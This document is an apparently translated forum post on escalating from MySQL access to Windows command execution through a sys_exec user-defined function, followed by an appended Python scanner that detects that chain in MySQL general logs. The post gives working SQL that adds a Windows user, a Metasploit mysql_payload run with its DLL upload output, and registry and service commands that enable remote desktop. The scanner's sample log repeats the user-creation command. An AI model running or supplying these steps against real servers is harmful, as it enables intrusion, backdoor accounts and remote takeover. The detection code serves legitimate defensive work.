At this point you have a shell that executes commands: create a .bat, run commands with cmd /c, or bounce back a payload. select sys_exec("c://windows/system32//cmd.exe /c net user dskjajkdlalk dsakjdjkasjkl /add");
drop Function sys_exec;
search mysql
msf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > show options
msf exploit(mysql_payload) > set password ssccd*
msf exploit(mysql_payload) > set rhost 111.111.111.111
msf exploit(mysql_payload) > show options
msf exploit(mysql_payload) > exploit
Started reverse handler on 192.168.1.116:4444
Checking target architecture...
Checking for sys_exec()...
Checking target architecture...
Checking for MySQL plugin directory...
[-] MySQL Error: RbMysql::UnknownSystemVariable Unknown system variable 'plugin_dir'
Target arch (win32) and target path both okay.
Uploading lib_mysqludf_sys_32.dll library to d:/Program Files/MySQL/MySQL Server 5.0/bin/KLCheXrJ.dll...
Checking for sys_exec()...
MySQL function sys_exec() not available
(screenshot: mysqludf)
Create Function sys_exec returns string soname 'KLCheXrJ.dll'; select sys_exec("c:\\windows\\system32\\cmd.exe /c net user dskjajkdlalk dsakjdjkasjkl /add");
drop Function sys_exec; This is what I used. Enable 3389 (RDP):
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config termservice start= auto >c:\123.txt
sc qc termservice >>c:\123.txt
sc start termservice >>c:\123.txt
sc qc termservice >>c:\123.txt
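As an added, defensive example that is not part of the original post: a small Python scanner over MySQL general_log lines that flags the three steps of the UDF chain shown above (CREATE FUNCTION ... SONAME, the sys_exec call, and the cleanup DROP FUNCTION) and ties them to one connection. The log lines and the "<time> <thread id> <command> <argument>" layout are constructed assumptions for the demo.

```python
import re
from dataclasses import dataclass

# Constructed sample of general_log lines mirroring the post's UDF chain (not real data).
SAMPLE_LOG = """\
120101 10:00:01   12 Connect   root@10.0.0.5 on
120101 10:00:02   12 Query     SELECT version()
120101 10:00:05   12 Query     Create Function sys_exec returns string soname 'KLCheXrJ.dll'
120101 10:00:07   12 Query     select sys_exec("c:\\\\windows\\\\system32\\\\cmd.exe /c net user dskjajkdlalk dsakjdjkasjkl /add")
120101 10:00:09   12 Query     drop Function sys_exec
120101 10:00:10   13 Query     SELECT name, dl FROM mysql.func
"""

# Detection rules: (name, severity, pattern). Case-insensitive because MySQL keywords are,
# and the post itself mixes "Create Function" with "select".
RULES = [
    ("udf_register", "high", re.compile(r"\bcreate\s+function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)),
    ("udf_exec_call", "critical", re.compile(r"\bsys_(exec|eval)\s*\(", re.I)),
    ("udf_cleanup", "medium", re.compile(r"\bdrop\s+function\s+(sys_\w+)", re.I)),
]

# Assumed general_log layout: date time, thread id, command type, argument.
LINE_RE = re.compile(r"^(\S+\s+\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

@dataclass
class Finding:
    rule: str
    severity: str
    thread_id: int
    statement: str

def scan_general_log(text):
    """Return one Finding per Query line that matches a UDF-abuse rule."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) != "Query":
            continue
        stmt = m.group(4)
        for name, sev, pat in RULES:
            if pat.search(stmt):
                findings.append(Finding(name, sev, int(m.group(2)), stmt))
    return findings

def summarize(findings):
    """Per connection: register + exec on the same thread is the full UDF chain."""
    by_thread = {}
    for f in findings:
        by_thread.setdefault(f.thread_id, set()).add(f.rule)
    return {tid: ("full_udf_chain" if {"udf_register", "udf_exec_call"} <= rules else "partial")
            for tid, rules in by_thread.items()}

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"[{f.severity}] thread {f.thread_id}: {f.rule}: {f.statement}")
    print(summarize(scan_general_log(SAMPLE_LOG)))
```

A hit on udf_register should be cross-checked against `SELECT name, dl FROM mysql.func` and against unexpected DLLs in the server's plugin or bin directory, since the DROP FUNCTION step removes the row but not the uploaded library.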